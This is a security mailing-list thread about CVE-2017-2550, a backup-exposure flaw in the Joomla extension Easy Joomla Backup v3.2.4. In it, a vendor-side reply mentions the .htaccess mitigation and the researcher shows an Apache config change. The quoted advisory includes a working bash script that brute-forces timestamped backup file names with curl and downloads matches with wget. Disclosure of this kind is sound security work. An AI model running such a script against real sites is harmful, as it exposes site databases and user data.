Re: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure

["Larry W. Cashdollar" <larry0 () me com>]

Hi David,

This is correct, hardened shared hosting platforms won't be vulnerable to this attack.

I've now updated the configuration on my lab Ubuntu system by changing apache2.conf:

# diff -Nur orig apache2.conf 
--- orig        2017-09-28 12:02:13.674668975 -0400
+++ apache2.conf        2017-09-28 11:47:50.898322778 -0400
@@ -163,7 +163,7 @@
 
 <Directory /var/www/>
        Options Indexes FollowSymLinks
-       AllowOverride None
+       AllowOverride All
        Require all granted
 </Directory>

Thanks,
Larry

> On Sep 28, 2017, at 9:09 AM, David Jardin <david.jardin () community joomla org> wrote:
>
> It’s worth to mention that the extension has a default .htaccess file with a „deny from all“ in the backup directory, 
> that will mitigate the described attack on pretty much any standard shared-hosting platform that I’m aware of.
>
>
>
>
> Am 28. September 2017 um 14:37:20, Larry W. Cashdollar (larry0 () me com) schrieb:
>
> > Title: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure 
> > Author: Larry W. Cashdollar, @_larry0 
> > Date: 2017-09-07 
> > CVE-ID:[CVE-2017-2550] 
> > Download Site: https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup 
> > Vendor: kubik-rubik 
> > Vendor Notified: 2017-09-07 
> > Vendor Contact: 
> > Advisory: http://www.vapidlabs.com/advisory.php?v=200 
> > Description: Easy Joomla Backup creates 'old-school' backups without any frills. 
> > Vulnerability: 
> > The software creates a copy of the backup in the web root. The file name is easily guessable as it's just a time 
> > stamp: 
> >
> > http://example.com/administrator/components/com_easyjoomlabackup/backups/DOMAIN_YEAR-MONTH-DAY_H-M-S.zip 
> >
> > Exploit Code: 
> > • #!/bin/bash 
> > • #Larry W. Cashdollar, @_larry0 9/7/2017 
> > • #Bruteforce download backups for Joomla Extension Easy Joomla Backup v3.2.4 
> > • #https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup 
> > • MONTH=09 
> > • DAY=07 
> > • YEAR=2017 
> > • Z=0 
> > • #May need to set the DOMAIN to $1 the target depending on how WP is configured. 
> > • DOMAIN=192.168.0.163 
> > •  
> > • echo "Scanning website for available backups:" 
> > • for y in `seq -w 0 23`; do 
> > • for x in `seq -w 0 59`; do 
> > • Y=`echo "scale=2;($Z/86000)*100"|bc`; 
> > • echo -ne 
> > "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CPATH
> >  $Y%" 
> > • for z in `seq -w 0 59`; do 
> > • Z=$(( $Z + 1 )); 
> > • 
> > CPATH="http://$1/administrator/components/com_easyjoomlabackup/backups/"$DOMAIN"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";;
> >  
> > • RESULT=`curl -s --head $CPATH|grep 200`; 
> > • if [ -n "$RESULT" ]; then 
> > • echo "" 
> > • echo "[+] Location $CPATH Found"; 
> > • echo "[+] Received $RESULT"; 
> > • echo "Downloading......"; 
> > • wget $CPATH 
> > • fi; 
> > • done 
> > • done 
> > • done 
> > • echo "Completed."
> -- 
> Kind Regards,
> David Jardin